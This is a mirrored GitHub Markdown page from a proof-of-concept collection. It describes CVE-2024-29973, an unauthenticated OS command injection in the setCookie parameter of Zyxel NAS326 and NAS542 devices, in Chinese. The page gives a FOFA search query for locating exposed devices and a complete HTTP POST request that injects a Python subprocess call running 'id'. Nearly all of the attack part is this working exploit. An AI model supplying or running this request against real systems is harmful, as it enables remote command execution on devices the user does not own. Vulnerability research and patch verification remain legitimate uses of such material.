mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-12 11:06:19 +00:00
29 lines
1.1 KiB
Markdown
29 lines
1.1 KiB
Markdown
![]() |
## Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
|
|||
|
|
|||
|
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
|
|||
|
|
|||
|
## fofa
|
|||
|
|
|||
|
```
|
|||
|
body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
|
|||
|
```
|
|||
|
|
|||
|
## poc
|
|||
|
|
|||
|
```
|
|||
|
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
|
|||
|
Host: your-ip
|
|||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|||
|
Accept: */*
|
|||
|
Accept-Language: en-US,en;q=0.5
|
|||
|
Accept-Encoding: gzip, deflate
|
|||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
|
|||
|
|
|||
|
------WebKitFormBoundaryHHaZAYecVOf5sfa6
|
|||
|
Content-Disposition: form-data; name="c0"
|
|||
|
|
|||
|
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
|
|||
|
------WebKitFormBoundaryHHaZAYecVOf5sfa6--
|
|||
|
```
|
|||
|
|
|||
|

|